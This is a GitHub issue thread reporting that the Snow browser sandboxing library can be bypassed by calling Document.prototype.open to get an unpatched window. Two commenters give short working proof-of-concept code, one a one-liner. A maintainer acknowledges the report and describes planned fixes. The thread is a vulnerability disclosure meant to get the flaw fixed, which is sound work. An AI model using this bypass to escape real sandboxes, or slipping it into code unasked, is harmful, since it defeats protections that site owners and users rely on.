### ISSUE TITLE
Snow can be bypassed with Document.prototype.open

### ISSUE THREAD

**Issue by deryilz** [LavaMoat/snow#139]
Reproduce by running

let x=Document.prototype.open.call(document, "", "", "");
window.alert = x.alert.bind(window)
x.close()
setTimeout(()=>{
    alert("Hello")
}, 500)

Document.prototype.open should be deleted or modified too, not just the version on window.document

**Comment by NDevTK** [comment]
One line version:
`Document.prototype.open.call(document, "", "", "").alert("Hello");`

**Comment by naugtur** [comment]
Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.
